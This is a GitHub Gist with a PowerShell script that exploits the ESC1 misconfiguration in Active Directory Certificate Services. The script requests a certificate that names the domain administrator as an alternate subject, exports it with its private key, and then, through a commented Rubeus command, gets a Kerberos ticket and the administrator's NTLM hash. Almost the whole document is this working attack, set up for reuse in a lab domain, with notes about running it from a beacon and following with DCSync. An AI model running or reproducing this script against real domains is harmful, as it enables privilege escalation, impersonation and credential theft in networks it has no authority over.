Created
February 22, 2023 21:50
-
-
Save b4cktr4ck2/95a9b908e57460d9958e8238f85ef8ee to your computer and use it in GitHub Desktop.
PowerShell script to exploit ESC1/retrieve your own NTLM password hash.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#Thank you @NotMedic for troubleshooting/validating stuff! | |
$password = Read-Host -Prompt "Enter Password" | |
#^^ Feel free to hardcode this for running in a beacon/not retyping it all the time! | |
$server = "admin" #This will just decide the name of the cert request files that are created. I didn't want to change the var name so it's server for now. | |
$CERTPATH = "C:\Users\lowpriv\Desktop\" #Where do you want the cert requests to be stored? | |
$CAFQDN = "dc01.alexlab.local" #hostname of underlying CA box. | |
$CASERVER = "alexlab-dc01-ca" #CA name. | |
$CA = $CAFQDN + "\" + $CASERVER | |
$CERTFILE = "C:\Users\lowpriv\Desktop\cert.pfx" #FULL PATH TO WHERE YOU WANT PFX TO BE GENERATED. | |
$TEMPLATE = "Wifi" #Vulnerable template to target. USE COMMON NAME *NOT* FRIENDLY NAME!!! | |
$domain = "alexlab.local" #domain | |
$target = "administrator" #Account username you're trying to impersonate | |
write-host "Variables set. Continue to create .inf" -foregroundcolor green | |
write-host "Generating Certificate INF File..." | |
$certinf = @" | |
;---------------CertificateRequestTemplate.inf-------------- | |
[NewRequest] | |
Subject="CN=$domain\$target" | |
Exportable=TRUE | |
KeySpec=1 | |
KeyUsage=0xf0 | |
[Extensions] | |
2.5.29.17 = "{text}" ; SAN - Subject Alternative Name | |
_continue_ = "upn=$target@$domain&" | |
[RequestAttributes] | |
CertificateTemplate=$TEMPLATE | |
"@ | |
#Uncomment the below INF if you want to request a cert for yourself and get your own NTLM hash. | |
#$certinf = @" | |
#;---------------CertificateRequestTemplate.inf-------------- | |
#[NewRequest] | |
#Subject="CN=$server" | |
#Exportable=TRUE | |
#KeySpec=1 | |
#KeyUsage=0xf0 | |
#[RequestAttributes] | |
#CertificateTemplate=$TEMPLATE | |
#"@ | |
$certinf > "$CERTPATH$server.inf" | |
write-host ".inf created. Continue to create .req file" -foregroundcolor green | |
CertReq.exe -new "$CERTPATH$server.inf" "$CERTPATH$server.req" | |
write-host ".req created. Checking to see of files exist" -foregroundcolor green | |
$testinf = Test-Path "$CERTPATH$server.inf" | |
$testreq = Test-Path "$CERTPATH$server.req" | |
if ($testinf -eq $true){ | |
write-host "$CERTPATH$server.inf successfully generated." -foregroundcolor green | |
} | |
else { | |
write-host "$CERTPATH$server.inf could not be found. Check for errors." -ForegroundColor Red | |
break | |
} | |
if ($testreq -eq $true){ | |
write-host "$CERTPATH$server.req successfully generated." -foregroundcolor green | |
} | |
else { | |
write-host "$CERTPATH$server.req could not be found. Check for errors." -ForegroundColor Red | |
break | |
} | |
write-host "Submitting new Certificate for $server" | |
CertReq -Submit -config "$CA" "$CERTPATH$server.req" "$CERTPATH$server.cer" | |
write-host "Importing .cer" | |
certreq -accept "$CERTPATH$server.cer" -user | |
write-host "All OK. Continue" -foregroundcolor green | |
#Exporting certificate with Private Key | |
write-host "Exporting PFX with private key" | |
$Thumbprint = gci Cert:\CurrentUser\My | Select-Object -Property Thumbprint -Last 1 | |
certutil -user -p $password -exportpfx My $Thumbprint.Thumbprint $CERTFILE "nochain" | |
#Cleaning | |
#pfft who cleans up after they're done | |
#Move-Item -Path "$CERTPATH*cer","$CERTPATH*inf","$CERTPATH*req" -Destination "C:\Users\lowpriv\Desktop\Cert" | |
#Rubeus.exe asktgt /getcredentials /password:"password_you_set" /user:user_you_impersonating /certificate:yourcert.pfx /domain:alexlab.local /dc:dc01 /show | |
#This will use PKINIT to build a TGT + retrieve NTLM hash of user you're targeting. Enjoy DCSYNC :) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment